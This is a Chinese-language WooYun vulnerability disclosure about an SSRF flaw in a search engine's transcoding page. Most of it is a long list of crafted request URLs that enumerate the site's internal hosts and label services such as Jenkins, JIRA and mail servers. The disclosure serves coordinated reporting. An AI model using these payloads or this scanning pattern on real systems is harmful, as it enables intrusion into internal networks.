当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061439

漏洞标题:内网编织者中国搜索引擎内网快速编织

相关厂商:中国搜索国家队

漏洞作者: Nebula

提交时间:2014-05-19 17:56

修复时间:2014-07-03 17:57

公开时间:2014-07-03 17:57

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-19: 细节已通知厂商并且等待厂商处理中
2014-05-24: 厂商已经确认,细节仅向厂商公开
2014-06-03: 细节向核心白帽子及相关领域专家公开
2014-06-13: 细节向普通白帽子公开
2014-06-23: 细节向实习白帽子公开
2014-07-03: 细节向公众公开

简要描述:

RT!

详细说明:


其实就是一个SSRF漏洞,某些功能设计缺陷,而又未进行参数是否污染的验证.参数可以根据众多协议,如:http;https;file;ftp等协议,借助当前应用服务器的内网权限,攻击内网其他应用、、、
如:这里搜索引擎的转码功能设计不当,就很容易造成这个问题(之前乌云已经有发了不少,这里提供快速编织内网其他web应用的结构),
转码简单流程:请求远程网页内容---》内容转码---》内容输出到页面
而这个请求的url是被外部任意控制的,而又未做当前内网访问验证,对于大型网站,特别是搜索引擎,形成最大危害!

漏洞证明:

首先,可以访问当前应用服务器等方法,以便快速判断是否存在漏洞(,如当前服务器8080端口应用):
http://tp.chinaso.com/web?url=http://127.0.0.1:8080&fr=client


正常设计,如果是内网地址,应该访问的是当前用户内网才是,这是合理的做法之一
但这里不是:

1.png


然后,利用首先网关应用访问的小技巧,快速确定几个使用的网段,再扫描这几个网段的80及8000端口,造成内网结构及内部应用的大量:


1.png


http://10.10.0.1
8080:
http://tp.chinaso.com/web?url=http://10.10.0.20:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.21:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.71:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.74:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.76:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.79:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.80:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.83:8080&fr=client(流量统计平台)
http://tp.chinaso.com/web?url=http://10.10.0.84:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.89:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.90:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.134:8080&fr=client(XAMPP)
http://tp.chinaso.com/web?url=http://10.10.0.135:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.136:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.138:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.188:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.191:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.195:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.198:8080&fr=client
80:
http://tp.chinaso.com/web?url=http://10.10.0.6:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.10:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.11:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.58:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.66:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.90:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.91:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.179:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.190:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.0.199:80&fr=client
http://10.10.16.1:
8080:
http://tp.chinaso.com/web?url=http://10.10.16.10:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.11:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.12:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.13:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.16:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.17:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.18:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.19:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.20:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.21:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.22:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.23:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.24:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.25:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.26:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.27:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.28:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.29:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.30:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.31:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.16.32:8080&fr=client(wdcp服务器/虚拟)
http://10.10.32.1:
http://tp.chinaso.com/web?url=http://10.10.32.10:80&fr=server
http://10.10.64.1
8080:
http://tp.chinaso.com/web?url=http://10.10.64.22:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.23:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.24:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.26:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.102:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.109:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.110:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.122:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.123:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.173:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.184:8080&fr=client(MySQLMTO)
http://tp.chinaso.com/web?url=http://10.10.64.189:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.190:8080&fr=client(专业搜索主页*****)
http://tp.chinaso.com/web?url=http://10.10.64.191:8080&fr=client(盘古搜索评测系统)
http://tp.chinaso.com/web?url=http://10.10.64.196:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.224:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.64.226:8080&fr=client(Spark)
http://tp.chinaso.com/web?url=http://10.10.64.227:8080&fr=client(System Dashboard - Chinaso365_JIRA)
http://tp.chinaso.com/web?url=http://10.10.64.228:8080&fr=client
80:
http://tp.chinaso.com/web?url=http://10.10.16.32:80&fr=server
http://10.10.128.1
8080:
http://tp.chinaso.com/web?url=http://10.10.128.10:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.11:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.12:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.13:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.14:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.16:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.25:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.28:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.29:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.33:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.36:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.37:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.41:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.44:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.45:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.46:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.47:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.48:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.49:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.50:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.51:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.52:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.53:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.55:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.56:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.57:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.58:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.61:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.71:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.72:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.73:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.74:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.75:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.76:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.78:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.79:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.82:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.85:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.86:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.87:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.88:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.89:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.94:8080&fr=client(转码平台)
http://tp.chinaso.com/web?url=http://10.10.128.95:8080&fr=client(转码平台)
http://tp.chinaso.com/web?url=http://10.10.128.98:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.100:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.101:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.104:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.114:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.118:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.119:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.120:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.133:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.139:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.140:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.145:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.128.241:8080&fr=client
80:
http://tp.chinaso.com/web?url=http://10.10.128.31:80&fr=server
http://tp.chinaso.com/web?url=http://10.10.128.41:80&fr=server
http://tp.chinaso.com/web?url=http://10.10.128.45:80&fr=server
http://tp.chinaso.com/web?url=http://10.10.128.98:80&fr=server
http://tp.chinaso.com/web?url=http://10.10.128.118:80&fr=server
http://tp.chinaso.com/web?url=http://10.10.128.119:80&fr=server
http://tp.chinaso.com/web?url=http://10.10.128.136:80&fr=server
http://tp.chinaso.com/web?url=http://10.10.128.137:80&fr=server
http://10.10.192.45
8080:
http://tp.chinaso.com/web?url=http://10.10.192.10:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.11:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.17:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.22:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.44:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.69:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.72:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.130:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.254:8080&fr=client
80:
http://tp.chinaso.com/web?url=http://10.10.192.10:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.11:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.13:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.14:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.17:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.22:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.25:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.32:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.33:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.34:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.36:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.42:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.44:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.45:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.47:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.69:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.83:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.84:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.85:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.86:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.87:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.89:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.92:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.98:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.114:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.115:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.120:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.121:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.123:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.124:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.128:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.129:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.130:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.131:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.171:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.172:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.181:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.185:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.191:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.211:80&fr=client(邮件)
http://tp.chinaso.com/web?url=http://10.10.192.213:80&fr=client(邮件)
http://tp.chinaso.com/web?url=http://10.10.192.216:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.220:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.230:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.249:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.252:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.253:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.192.254:80&fr=client
http://10.10.160.1
80:
http://tp.chinaso.com/web?url=http://10.10.160.46:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.49:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.232:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.244:80&fr=client
8080:
http://tp.chinaso.com/web?url=http://10.10.160.17:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.19:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.20:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.22:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.48:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.68:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.69:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.70:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.72:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.85:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.86:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.93:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.94:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.147:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.152:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.156:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.157:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.158:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.160:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.161:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.162:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.163:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.180:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.181:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.193:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.194:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.198:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.199:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.203:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.204:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.205:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.208:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.209:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.236:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.237:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.242:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.243:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.250:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.160.254:8080&fr=client
http://10.10.211.1
8080:
http://tp.chinaso.com/web?url=http://10.10.211.10:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.15:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.21:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.65:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.68:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.76:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.84:8080&fr=client
80:
http://tp.chinaso.com/web?url=http://10.10.211.12:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.22:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.23:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.81:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.84:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.85:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.211.110:80&fr=client
http://10.10.224.1
80:
http://tp.chinaso.com/web?url=http://10.10.224.10:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.22:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.24:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.83:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.100:80&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.101:80&fr=client
8080:
http://tp.chinaso.com/web?url=http://10.10.224.10:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.14:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.44:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.55:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.93:8080&fr=client  (Jenkins)
http://tp.chinaso.com/web?url=http://10.10.224.115:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.116:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.117:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.118:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.119:8080&fr=client
http://tp.chinaso.com/web?url=http://10.10.224.120:8080&fr=client


内网结构一目了然:

1.png


1.png


1.png


1.png


1.png


1.png


1.png


。。。
(当然还是可以利用一些PoC及exp攻击存在漏洞的应用等,由于时间关系就没去找了!)

修复方案:

验证内网请求等!

版权声明:转载请注明来源 Nebula@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-24 12:56

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向网站主管部门——新华社技术局通报。对方已经着手处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-19 18:34 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我日啊

  2. 2014-05-19 20:08 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    高大下

  3. 2014-07-05 15:03 | dlevr ( 实习白帽子 | Rank:33 漏洞数:10 | 菜鸟一只,大神勿喷!)

    好牛逼

  4. 2014-07-07 00:52 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    盘古最近为什么这么火